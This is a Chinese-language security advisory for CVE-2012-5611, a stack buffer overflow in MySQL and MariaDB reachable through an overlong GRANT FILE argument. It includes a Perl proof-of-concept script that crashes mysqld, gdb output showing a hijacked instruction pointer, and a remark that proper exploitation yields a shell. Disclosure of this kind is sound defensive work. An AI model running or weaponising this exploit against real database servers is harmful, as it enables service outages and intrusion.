mysql4.1.2缓冲区溢出漏洞_Oracle MySQL/MariaDB acl_get()和check_grant_db_routine()函数缓冲区溢出漏洞...

发布日期：2012-12-01

更新日期：2012-12-05

受影响系统：

Oracle MySQL 5.5.19

MariaDB MariaDB 5.x

描述：

--------------------------------------------------------------------------------

BUGTRAQ  ID: 56769

CVE(CAN) ID: CVE-2012-5611

Oracle MySQL Server是一个小型关系型数据库管理系统。

MySQL 5.5.19、5.1.53及其他版本、MariaDB 5.5.2.x、5.3.x、5.2.x、5.1.x内acl_get()、check_grant_db_routine()函数存在缓冲区溢出漏洞，具有MariaDB (MySQL)服务器低权限的用户可通过GRANT FILE命令的超长参数，造成mysqld崩溃或任意代码执行。

链接：http://secunia.com/advisories/51427/

http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0005.html

http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0010.html

https://bugzilla.RedHat.com/show_bug.cgi?id=881064

https://mariadb.atlassian.net/browse/MDEV-3884

*>

测试方法：

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#!/usr/bin/perl

=for comment

MySQL Server exploitable stack based overrun

Ver 5.5.19-log for Linux and below (tested with Ver 5.1.53-log for SUSE-linux-gnu too)

unprivileged user (any account (anonymous account?), post auth)

as illustrated below the instruction pointer is overwritten with 0x41414141

bug found by Kingcope

this will yield a shell as the user 'mysql' when properly exploited

mysql@linux-lsd2:/root> gdb -c /var/lib/mysql/core

GNU gdb (GDB) SUSE (7.2-3.3)

Copyright (C) 2010 Free Software Foundation, Inc.

License GPLv3+: GNU GPL version 3 or later

This is free software: you are free to change and redistribute it.

There is NO WARRANTY, to the extent permitted by law.  Type "show copying"

and "show warranty" for details.

This GDB was configured as "i586-suse-linux".

For bug reporting instructions, please see:

.

Missing separate debuginfo for the main executable file

Try: zypper install -C "debuginfo(build-id)=768fdbea8f1bf1f7cfb34c7f532f7dd0bdd76803"

[New Thread 8801]

[New Thread 8789]

[New Thread 8793]

[New Thread 8791]

[New Thread 8787]

[New Thread 8790]

[New Thread 8799]

[New Thread 8794]

[New Thread 8792]

[New Thread 8788]

[New Thread 8800]

[New Thread 8786]

[New Thread 8797]

[New Thread 8798]

[New Thread 8785]

[New Thread 8796]

[New Thread 8783]

Core was generated by `/usr/local/mysql/bin/mysqld --log=/tmp/mysqld.log'.

Program terminated with signal 11, Segmentation fault.

#0  0x41414141 in ?? ()

(gdb)

=cut

use strict;

use DBI();

# Connect to the database.

my $dbh = DBI->connect("DBI:mysql:database=test;host=192.168.2.3;",

"user", "secret",

{'RaiseError' => 1});

$a ="A" x 100000;

my $sth = $dbh->prepare("grant file on $a.* to 'user'\@'%' identified by 'secret';");

$sth->execute();

# Disconnect from the database.

$dbh->disconnect();

建议：

--------------------------------------------------------------------------------

厂商补丁：

MariaDB

-------

目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：